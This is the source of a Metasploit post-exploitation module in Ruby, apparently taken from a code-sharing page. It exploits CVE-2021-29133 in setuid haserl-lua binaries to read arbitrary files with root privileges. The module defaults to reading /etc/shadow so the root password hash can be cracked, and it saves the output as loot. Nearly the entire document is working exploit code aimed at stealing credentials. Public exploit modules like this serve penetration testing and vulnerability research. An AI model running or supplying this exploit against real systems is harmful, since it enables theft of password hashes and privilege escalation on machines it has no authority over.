Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.

1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5

6
class MetasploitModule < Msf::Post
7
  include Msf::Post::File
8
  include Msf::Post::Linux::System
9

10
  def initialize(info = {})
11
    super(
12
      update_info(
13
        info,
14
        'Name' => 'Haserl Arbitrary File Reader',
15
        'Description' => %q{
16
          This module exploits haserl prior to 0.9.36 to read arbitrary files.
17
          The most widely accepted exploitation vector is reading /etc/shadow,
18
          which will reveal root's hash for cracking.
19
        },
20
        'License' => MSF_LICENSE,
21
        'Author' => [
22
          'Julien (jvoisin) Voisin', # metasploit module
23
          'Ike Broflovski' # discovery
24
        ],
25
        'Platform' => [ 'linux' ],
26
        'SessionTypes' => [ 'shell', 'meterpreter' ],
27
        'References' => [
28
          ['URL', 'https://twitter.com/steaIth/status/1364940271054712842'],
29
          ['URL', 'https://gitlab.alpinelinux.org/alpine/aports/-/issues/12539'],
30
          ['CVE', '2021-29133']
31
        ],
32
        'Notes' => {
33
          'Stability' => [CRASH_SAFE],
34
          'SideEffects' => [IOC_IN_LOGS],
35
          'Reliability' => []
36
        }
37
      )
38
    )
39
    register_options([
40
      OptString.new('RFILE', [true, 'File to read', '/etc/shadow']),
41
    ])
42
  end
43

44
  def haserl_lua_paths
45
    begin
46
      files = get_suid_files('/usr/bin')
47
    rescue StandardError
48
      return
49
    end
50

51
    return unless files
52

53
    return files.select { |f| File.basename(f).starts_with?('haserl-lua') }
54
  end
55

56
  def run
57
    if is_root?
58
      fail_with(Failure::BadConfig, 'Session already has root privileges')
59
    end
60

61
    files = haserl_lua_paths
62

63
    if files.nil? || files.empty?
64
      fail_with(Failure::NotVulnerable, 'Could not find setuid haserl lua executable in /usr/bin/')
65
    end
66

67
    binary = files.first
68

69
    print_good("Found set-uid haserl: #{binary}")
70

71
    output = cmd_exec("#{binary} '#{datastore['RFILE']}'")
72

73
    return if output.empty?
74

75
    fname = File.basename(datastore['RFILE'].downcase)
76
    p = store_loot(
77
      "haserl_#{fname}",
78
      'text/plain',
79
      session,
80
      output,
81
      "haserl_#{fname}",
82
      'haserl arbitrary read'
83
    )
84
    vprint_good("#{fname} saved in: #{p}")
85
  end
86
end
87

88